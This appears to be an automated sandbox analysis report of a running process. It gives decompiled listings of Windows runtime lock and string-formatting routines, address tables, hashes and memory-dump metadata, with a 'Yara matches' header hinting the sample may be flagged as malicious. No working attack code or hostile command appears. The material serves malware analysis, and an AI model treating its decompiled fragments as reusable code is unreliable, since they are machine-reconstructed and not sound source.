                                                                                                                                                    0x00ca1490
                                                                                                                                                    0x00ca1495
                                                                                                                                                    0x00ca138e
                                                                                                                                                    0x00ca1390
                                                                                                                                                    0x00ca1397
                                                                                                                                                    0x00ca1398
                                                                                                                                                    0x00ca1399
                                                                                                                                                    0x00ca13a1
                                                                                                                                                    0x00ca13a4
                                                                                                                                                    0x00ca13a4
                                                                                                                                                    0x00ca1498
                                                                                                                                                    0x00ca149c
                                                                                                                                                    0x00ca149f
                                                                                                                                                    0x00ca14a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca14a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca14a4
                                                                                                                                                    0x00ca1413
                                                                                                                                                    0x00ca1415
                                                                                                                                                    0x00ca1416
                                                                                                                                                    0x00ca1419
                                                                                                                                                    0x00ca141c
                                                                                                                                                    0x00ca1422
                                                                                                                                                    0x00ca13b7
                                                                                                                                                    0x00ca13bc
                                                                                                                                                    0x00ca13bf
                                                                                                                                                    0x00ca13bf
                                                                                                                                                    0x00ca13c2
                                                                                                                                                    0x00ca1424
                                                                                                                                                    0x00ca1424
                                                                                                                                                    0x00ca1424
                                                                                                                                                    0x00ca1427
                                                                                                                                                    0x00ca142b
                                                                                                                                                    0x00ca142c
                                                                                                                                                    0x00ca142c
                                                                                                                                                    0x00ca142c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca141c
                                                                                                                                                    0x00ca1411

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                    • Opcode ID: 06fbfc1847bc87bcea8409bc5981f579218720b16fd7d024548130532b447c0d
                                                                                                                                                    • Instruction ID: b87914ceb273a23197d4c5b6777e23d351d5be9a4b8780b35da8e0f60b0b3ed3
                                                                                                                                                    • Opcode Fuzzy Hash: 06fbfc1847bc87bcea8409bc5981f579218720b16fd7d024548130532b447c0d
                                                                                                                                                    • Instruction Fuzzy Hash: 0F6106B1904656BACF34DF9DC8808BEBBB5EF9A304B18C12DF8E647541D234AB40DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 49%
                                                                                                                                                    			E00CA0554(signed int _a4, char _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int* _t49;
                                                                                                                                                    				signed int _t51;
                                                                                                                                                    				signed int _t56;
                                                                                                                                                    				signed int _t58;
                                                                                                                                                    				signed int _t61;
                                                                                                                                                    				signed int _t63;
                                                                                                                                                    				void* _t66;
                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                    				signed int _t70;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				signed int _t81;
                                                                                                                                                    				signed int _t84;
                                                                                                                                                    				void* _t86;
                                                                                                                                                    				signed int _t93;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                    				signed int _t107;
                                                                                                                                                    				void* _t110;
                                                                                                                                                    				signed int _t115;
                                                                                                                                                    				signed int* _t119;
                                                                                                                                                    				void* _t125;
                                                                                                                                                    				void* _t126;
                                                                                                                                                    				signed int _t128;
                                                                                                                                                    				signed int _t130;
                                                                                                                                                    				signed int _t138;
                                                                                                                                                    				signed int _t144;
                                                                                                                                                    				void* _t158;
                                                                                                                                                    				void* _t159;
                                                                                                                                                    				void* _t160;
                                                                                                                                                    
                                                                                                                                                    				_t96 = _a4;
                                                                                                                                                    				_t115 =  *(_t96 + 0x28);
                                                                                                                                                    				_push(_t138);
                                                                                                                                                    				if(_t115 < 0) {
                                                                                                                                                    					_t105 =  *[fs:0x18];
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                    						goto L6;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eflags = _t115 | 0xffffffff;
                                                                                                                                                    						asm("lock xadd [eax], edx");
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L6:
                                                                                                                                                    					_push(_t128);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L7:
                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                    						if(_t115 >= 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							return 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    							_t49 = _t96 + 0x1c;
                                                                                                                                                    							_t106 = 1;
                                                                                                                                                    							asm("lock xadd [edx], ecx");
                                                                                                                                                    							_t115 =  *(_t96 + 0x28);
                                                                                                                                                    							__eflags = _t115;
                                                                                                                                                    							if(_t115 < 0) {
                                                                                                                                                    								L23:
                                                                                                                                                    								_t130 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d401c0;
                                                                                                                                                    									_push(_t144);
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_t51 = E00C5F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                    									__eflags = _t51 - 0x102;
                                                                                                                                                    									if(_t51 != 0x102) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t106 =  *(_t144 + 4);
                                                                                                                                                    									_t126 =  *_t144;
                                                                                                                                                    									_t86 = L00CA4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                    									_push(_t126);
                                                                                                                                                    									_push(_t86);
                                                                                                                                                    									L00CB3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                    									L00CB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    									_t130 = _t130 + 1;
                                                                                                                                                    									_t160 = _t158 + 0x28;
                                                                                                                                                    									__eflags = _t130 - 2;
                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                    										E00CE217A(_t106, __eflags, _t96);
                                                                                                                                                    									}
                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_push(0x65);
                                                                                                                                                    									L00CB3F92();
                                                                                                                                                    									_t158 = _t160 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t51);
                                                                                                                                                    									L00CA3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									while(1) {
                                                                                                                                                    										L32:
                                                                                                                                                    										__eflags = _a8;
                                                                                                                                                    										if(_a8 == 0) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    										_t119 = _t96 + 0x24;
                                                                                                                                                    										_t107 = 1;
                                                                                                                                                    										asm("lock xadd [eax], ecx");
                                                                                                                                                    										_t56 =  *(_t96 + 0x28);
                                                                                                                                                    										_a4 = _t56;
                                                                                                                                                    										__eflags = _t56;
                                                                                                                                                    										if(_t56 != 0) {
                                                                                                                                                    											L40:
                                                                                                                                                    											_t128 = 0;
                                                                                                                                                    											__eflags = 0;
                                                                                                                                                    											while(1) {
                                                                                                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    												asm("sbb esi, esi");
                                                                                                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d401c0;
                                                                                                                                                    												_push(_t138);
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_t58 = E00C5F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                    												__eflags = _t58 - 0x102;
                                                                                                                                                    												if(_t58 != 0x102) {
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t107 =  *(_t138 + 4);
                                                                                                                                                    												_t125 =  *_t138;
                                                                                                                                                    												_t75 = L00CA4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                    												_push(_t125);
                                                                                                                                                    												_push(_t75);
                                                                                                                                                    												L00CB3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                    												L00CB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    												_t128 = _t128 + 1;
                                                                                                                                                    												_t159 = _t158 + 0x28;
                                                                                                                                                    												__eflags = _t128 - 2;
                                                                                                                                                    												if(__eflags > 0) {
                                                                                                                                                    													E00CE217A(_t107, __eflags, _t96);
                                                                                                                                                    												}
                                                                                                                                                    												_push("RTL: Re-Waiting\n");
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_push(0x65);
                                                                                                                                                    												L00CB3F92();
                                                                                                                                                    												_t158 = _t159 + 0xc;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags = _t58;
                                                                                                                                                    											if(__eflags < 0) {
                                                                                                                                                    												_push(_t58);
                                                                                                                                                    												L00CA3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                    												asm("int3");
                                                                                                                                                    												_t61 =  *_t107;
                                                                                                                                                    												 *_t107 = 0;
                                                                                                                                                    												__eflags = _t61;
                                                                                                                                                    												if(_t61 == 0) {
                                                                                                                                                    													L1:
                                                                                                                                                    													_t63 = E00C85384(_t138 + 0x24);
                                                                                                                                                    													if(_t63 != 0) {
                                                                                                                                                    														goto L52;
                                                                                                                                                    													} else {
                                                                                                                                                    														goto L2;
                                                                                                                                                    													}
                                                                                                                                                    												} else {
                                                                                                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                    													_push( &_a4);
                                                                                                                                                    													_push(_t61);
                                                                                                                                                    													_t70 = L00C5F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                    													__eflags = _t70;
                                                                                                                                                    													if(__eflags >= 0) {
                                                                                                                                                    														goto L1;
                                                                                                                                                    													} else {
                                                                                                                                                    														_push(_t70);
                                                                                                                                                    														L00CA3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                    														L52:
                                                                                                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    														_push( &_a4);
                                                                                                                                                    														_push(1);
                                                                                                                                                    														_t63 = L00C5F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    														__eflags = _t63;
                                                                                                                                                    														if(__eflags >= 0) {
                                                                                                                                                    															L2:
                                                                                                                                                    															return _t63;
                                                                                                                                                    														} else {
                                                                                                                                                    															_push(_t63);
                                                                                                                                                    															L00CA3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    															_push( &_a4);
                                                                                                                                                    															_push(1);
                                                                                                                                                    															_t63 = L00C5F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    															__eflags = _t63;
                                                                                                                                                    															if(__eflags >= 0) {
                                                                                                                                                    																goto L2;
                                                                                                                                                    															} else {
                                                                                                                                                    																_push(_t63);
                                                                                                                                                    																_t66 = L00CA3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                    																asm("int3");
                                                                                                                                                    																while(1) {
                                                                                                                                                    																	_t110 = _t66;
                                                                                                                                                    																	__eflags = _t66 - 1;
                                                                                                                                                    																	if(_t66 != 1) {
                                                                                                                                                    																		break;
                                                                                                                                                    																	}
                                                                                                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                    																	_t66 = _t110;
                                                                                                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                    																	__eflags = _t66 - _t110;
                                                                                                                                                    																	if(_t66 != _t110) {
                                                                                                                                                    																		continue;
                                                                                                                                                    																	} else {
                                                                                                                                                    																		_t67 =  *[fs:0x18];
                                                                                                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                    																		return _t67;
                                                                                                                                                    																	}
                                                                                                                                                    																	goto L58;
                                                                                                                                                    																}
                                                                                                                                                    																E00C85329(_t110, _t138);
                                                                                                                                                    																return E00C853A5(_t138, 1);
                                                                                                                                                    															}
                                                                                                                                                    														}
                                                                                                                                                    													}
                                                                                                                                                    												}
                                                                                                                                                    											} else {
                                                                                                                                                    												_t56 =  *(_t96 + 0x28);
                                                                                                                                                    												goto L3;
                                                                                                                                                    											}
                                                                                                                                                    										} else {
                                                                                                                                                    											_t107 =  *_t119;
                                                                                                                                                    											__eflags = _t107;
                                                                                                                                                    											if(__eflags > 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													_t81 = _t107;
                                                                                                                                                    													asm("lock cmpxchg [edi], esi");
                                                                                                                                                    													__eflags = _t81 - _t107;
                                                                                                                                                    													if(_t81 == _t107) {
                                                                                                                                                    														break;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t81;
                                                                                                                                                    													__eflags = _t81;
                                                                                                                                                    													if(_t81 > 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													}
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t56 = _a4;
                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                    											}
                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													L3:
                                                                                                                                                    													__eflags = _t56;
                                                                                                                                                    													if(_t56 != 0) {
                                                                                                                                                    														goto L32;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t107 | 0xffffffff;
                                                                                                                                                    													_t56 = 0;
                                                                                                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                    													__eflags = 0;
                                                                                                                                                    													if(0 != 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													} else {
                                                                                                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                    														return 1;
                                                                                                                                                    													}
                                                                                                                                                    													goto L58;
                                                                                                                                                    												}
                                                                                                                                                    												continue;
                                                                                                                                                    											} else {
                                                                                                                                                    												goto L40;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    										goto L58;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = 0;
                                                                                                                                                    									return 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t115 =  *(_t96 + 0x28);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t106 =  *_t49;
                                                                                                                                                    								__eflags = _t106;
                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                    									while(1) {
                                                                                                                                                    										_t93 = _t106;
                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                    										__eflags = _t93 - _t106;
                                                                                                                                                    										if(_t93 == _t106) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										_t106 = _t93;
                                                                                                                                                    										__eflags = _t93;
                                                                                                                                                    										if(_t93 > 0) {
                                                                                                                                                    											continue;
                                                                                                                                                    										}
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t106;
                                                                                                                                                    								}
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L23;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L58;
                                                                                                                                                    					}
                                                                                                                                                    					_t84 = _t115;
                                                                                                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                    					__eflags = _t84 - _t115;
                                                                                                                                                    					if(_t84 != _t115) {
                                                                                                                                                    						_t115 = _t84;
                                                                                                                                                    						goto L7;
                                                                                                                                                    					} else {
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L58:
                                                                                                                                                    			}



































                                                                                                                                                    0x00cc237f
                                                                                                                                                    0x00cc237f
                                                                                                                                                    0x00cc2385
                                                                                                                                                    0x00cc2386
                                                                                                                                                    0x00cc2389
                                                                                                                                                    0x00cc238e
                                                                                                                                                    0x00cc2390
                                                                                                                                                    0x00c85378
                                                                                                                                                    0x00c8537c
                                                                                                                                                    0x00cc2396
                                                                                                                                                    0x00cc2396
                                                                                                                                                    0x00cc2397
                                                                                                                                                    0x00cc239c
                                                                                                                                                    0x00cc23a2
                                                                                                                                                    0x00cc23a3
                                                                                                                                                    0x00cc23a6
                                                                                                                                                    0x00cc23ab
                                                                                                                                                    0x00cc23ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc23b3
                                                                                                                                                    0x00cc23b3
                                                                                                                                                    0x00cc23b4
                                                                                                                                                    0x00cc23b9
                                                                                                                                                    0x00cc23ba
                                                                                                                                                    0x00cc23ba
                                                                                                                                                    0x00cc23bc
                                                                                                                                                    0x00cc23bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cb9153
                                                                                                                                                    0x00cb9158
                                                                                                                                                    0x00cb915a
                                                                                                                                                    0x00cb915e
                                                                                                                                                    0x00cb9160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cb9166
                                                                                                                                                    0x00cb9166
                                                                                                                                                    0x00cb9171
                                                                                                                                                    0x00cb9176
                                                                                                                                                    0x00cb9176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cb9160
                                                                                                                                                    0x00cc23c6
                                                                                                                                                    0x00cc23d7
                                                                                                                                                    0x00cc23d7
                                                                                                                                                    0x00cc23ad
                                                                                                                                                    0x00cc2390
                                                                                                                                                    0x00cc2373
                                                                                                                                                    0x00cc233f
                                                                                                                                                    0x00cc233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc233f
                                                                                                                                                    0x00cc2291
                                                                                                                                                    0x00cc2291
                                                                                                                                                    0x00cc2293
                                                                                                                                                    0x00cc2295
                                                                                                                                                    0x00cc229a
                                                                                                                                                    0x00cc22a1
                                                                                                                                                    0x00cc22a3
                                                                                                                                                    0x00cc22a7
                                                                                                                                                    0x00cc22a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc22ab
                                                                                                                                                    0x00cc22ad
                                                                                                                                                    0x00cc22af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc22af
                                                                                                                                                    0x00cc22b1
                                                                                                                                                    0x00cc22b4
                                                                                                                                                    0x00cc22b4
                                                                                                                                                    0x00cc22b6
                                                                                                                                                    0x00c853be
                                                                                                                                                    0x00c853be
                                                                                                                                                    0x00c853be
                                                                                                                                                    0x00c853c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c853cb
                                                                                                                                                    0x00c853ce
                                                                                                                                                    0x00c853d0
                                                                                                                                                    0x00c853d4
                                                                                                                                                    0x00c853d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c853d8
                                                                                                                                                    0x00c853e3
                                                                                                                                                    0x00c853ea
                                                                                                                                                    0x00c853ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c853d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc22b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc228f
                                                                                                                                                    0x00cc2349
                                                                                                                                                    0x00cc234d
                                                                                                                                                    0x00cc2251
                                                                                                                                                    0x00cc2251
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc2251
                                                                                                                                                    0x00cc21a4
                                                                                                                                                    0x00cc21a4
                                                                                                                                                    0x00cc21a6
                                                                                                                                                    0x00cc21a8
                                                                                                                                                    0x00cc21ac
                                                                                                                                                    0x00cc21b6
                                                                                                                                                    0x00cc21b8
                                                                                                                                                    0x00cc21bc
                                                                                                                                                    0x00cc21be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc21c0
                                                                                                                                                    0x00cc21c2
                                                                                                                                                    0x00cc21c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc21c4
                                                                                                                                                    0x00cc21c6
                                                                                                                                                    0x00cc21c6
                                                                                                                                                    0x00cc21c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc21c8
                                                                                                                                                    0x00cc21a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc2183
                                                                                                                                                    0x00ca057b
                                                                                                                                                    0x00ca057d
                                                                                                                                                    0x00ca0581
                                                                                                                                                    0x00ca0583
                                                                                                                                                    0x00cc2178
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca0589
                                                                                                                                                    0x00ca058f
                                                                                                                                                    0x00ca058f
                                                                                                                                                    0x00ca0583
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC2206
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                    • Opcode ID: 953951fd0624ce2bee35236a298f02bf2e410f97e87b2090cd1eb2225c24801b
                                                                                                                                                    • Instruction ID: c3136672f4ab0e3194c33b2528c31daab632d2c50e0269dbecfc223b009ac1c4
                                                                                                                                                    • Opcode Fuzzy Hash: 953951fd0624ce2bee35236a298f02bf2e410f97e87b2090cd1eb2225c24801b
                                                                                                                                                    • Instruction Fuzzy Hash: 8C515B31B002426FEB14CE18CCC1FA633A9AF95720F25426DFD55DB286DA71ED428794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00CCEA22
                                                                                                                                                      • Part of subcall function 00CA13CB: ___swprintf_l.LIBCMT ref: 00CA146B
                                                                                                                                                      • Part of subcall function 00CA13CB: ___swprintf_l.LIBCMT ref: 00CA1490
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00CA156D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                    • Opcode ID: eeb60b7a261000ca097da4b4b90df9654a8131425abb13ff50ee14f0d10b032c
                                                                                                                                                    • Instruction ID: 22297f5b861ae28b446815afeee2f6292f03b7bb00bd1a81d79512213d65094e
                                                                                                                                                    • Opcode Fuzzy Hash: eeb60b7a261000ca097da4b4b90df9654a8131425abb13ff50ee14f0d10b032c
                                                                                                                                                    • Instruction Fuzzy Hash: 9621C172D0021AAFCF21DE58CC45AEE73ACEB91714F484526FC56D3140DB70EA589BE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC22F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00CC2328
                                                                                                                                                    • RTL: Resource at %p, xrefs: 00CC230B
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CC22FC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: da94a2f52174091fd64f3f530781d5ecd7ac90a7d6d3f98f487a922091cac638
                                                                                                                                                    • Instruction ID: 6f7c54d6de3ed7201684eff4d196e6b9c426ce51e12082da46c68bc554e5757d
                                                                                                                                                    • Opcode Fuzzy Hash: da94a2f52174091fd64f3f530781d5ecd7ac90a7d6d3f98f487a922091cac638
                                                                                                                                                    • Instruction Fuzzy Hash: D95126716007026BEB15EB28CC81FA7739CEF55364F104229FD19DB291EAB1EE4297A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Executed Functions

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000B820D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
